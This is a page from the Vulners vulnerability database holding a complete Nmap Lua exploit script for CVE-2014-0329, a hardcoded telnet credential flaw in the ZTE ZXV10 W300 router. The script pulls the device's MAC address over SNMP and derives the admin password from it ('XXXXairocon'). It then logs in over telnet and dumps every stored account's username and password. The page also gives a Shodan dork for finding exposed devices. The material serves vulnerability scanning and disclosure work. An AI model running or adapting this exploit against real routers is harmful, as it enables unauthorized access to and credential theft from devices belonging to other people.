Vulners
Lucene search
ZTE ZXV10 W300 Router - Hardcoded Credentials
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | ZTE ZXV10 W300 Router - Hardcoded Credentials | 9 Feb 201400:00 | – | zdt |
 | CVE-2014-0329 | 4 Feb 201402:00 | – | cve |
 | CVE-2014-0329 | 4 Feb 201402:00 | – | cvelist |
 | ZTE ZXV10 W300 Router - Hard-Coded Credentials | 9 Feb 201400:00 | – | exploitdb |
 | ZTE ZXV10 W300 Router - Hard-Coded Credentials | 9 Feb 201400:00 | – | exploitpack |
 | CVE-2014-0329 | 4 Feb 201405:39 | – | nvd |
 | ZTE ZXV10 W300 Wireless Router Hardcoded Credentials Security Bypass Vulnerability (SNMP/Telnet) | 10 Feb 201400:00 | – | openvas |
 | ZTE ZXV10 W300 Hardcoded Credentials | 9 Feb 201400:00 | – | packetstorm |
 | Hardcoded credentials | 4 Feb 201405:39 | – | prion |
 | ZTE ZXV10 W300 Router信任管理漏洞 | 11 Feb 201400:00 | – | seebug |
10
# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials
# Date: 03 Feb 2014
# Exploit Author: Cesar Neira
# Vendor Homepage: http://wwwen.zte.com.cn/
# Version: ZTE ZXV10 W300 v2.1
# CVE : CVE-2014-0329
# Dork (Shodan): Basic realm="index.htm"
# References:
http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
local nmap = require "nmap"
local stdnse = require "stdnse"
local snmp = require "snmp"
local vulns = require "vulns"
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the
telnet service on the device. The username is "admin" and the password is
"XXXXairocon" where "XXXX" is the last four characters of the device's MAC
address. The MAC address is obtainable over SNMP with community string public.
]]
author = "Cesar Neira"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit", "intrusive"}
---
--
-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org
-- @output
-- PORT STATE SERVICE
-- 23/tcp open telnet
-- 161/udp open|filtered snmp
--
-- Host script results:
-- | airocon:
-- | VULNERABLE:
-- | ZTE ZXV10 W300 router contains hardcoded credentials
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-0329
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
-- | service on the device. The username is "admin" and the password is "XXXXairocon"
-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address
-- | is obtainable over SNMP with community string public.
-- | Disclosure date: 2014-2-3
-- | Exploit results:
-- | admin:1234
-- | support:1234
-- | admin:0E91airocon
-- | References:
-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329
-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
-- |_ http://www.kb.cert.org/vuls/id/228886
-- @args community SNMP community (Default: public)
--
---
local DEFAULT_COMMUNITY = "public"
hostrule = function(host)
local snmp_port, telnet_port
snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})
if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then
return false
end
telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})
if not telnet_port and not telnet_port.state == "open" then
return false
end
return true
end
local get_mac = function(host, community)
local socket, status, response
socket = nmap.new_socket("udp")
socket:set_timeout(5000)
status, response = socket:connect(host, 161)
if not status then
socket:close()
return status, response
end
local payload, request
request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")
payload = snmp.encode(snmp.buildPacket(request, 0, community))
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_bytes(1)
if not status then
socket:close()
return status, response
end
socket:close()
local result
result = snmp.fetchFirst(response)
if not result then
return false, "Unexpected response value."
end
return true, stdnse.tohex(result)
end
local dump_creds = function(host, user, password)
local socket, status, response
socket = nmap.new_socket("tcp")
socket:set_timeout(5000)
status, response = socket:connect(host, 23)
if not status then
socket:close()
return status, response
end
local payload
payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_buf("exit", false)
if not status then
socket:close()
return status, response
end
socket:close()
return true, response
end
local parse_response = function(response)
local index
index = string.find(response, "Username +Password +Priority")
if not index then
return false, "Unexpected response value."
end
index = string.find(response, "\r\n", index) + 2
response = string.sub(response, index)
local result, endl, line
result = {}
index = 0
endl = string.find(response, "\r\n", index)
while endl do
line = string.sub(response, index, endl)
line = string.gsub(line, "\r", "")
line = string.gsub(line, "^ +", "")
line = string.gsub(line, " +$", "")
line = string.gsub(line, " +", " ")
local user, pass, prio
for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
local aux = {}
aux['username'] = user
aux['password'] = pass
aux['priority'] = prio
table.insert(result, aux)
end
index = endl + 2
endl = string.find(response, "\r\n", index)
end
return true, result
end
action = function(host)
local vuln = {
title = "ZTE ZXV10 W300 router contains hardcoded credentials",
state = vulns.STATE.NOT_VULN,
IDS = {CVE = 'CVE-2014-0329'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
references = {
"http://www.kb.cert.org/vuls/id/228886",
"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
},
dates = {
disclosure = {year = 2014, month = 2, day = 3},
},
exploit_results = {},
}
local community
community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY
local status, response
status, response = get_mac(host, community)
if not status then
return response
end
local password
password = string.upper(string.sub(response, 9)) .. "airocon"
status, response = dump_creds(host, "admin", password)
if not status then
return response
end
status, response = parse_response( response )
if not status then
return response
end
vuln.state = vulns.STATE.EXPLOIT
for _, data in pairs(response) do
table.insert(vuln.exploit_results, data.username .. ":" .. data.password)
end
return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.25021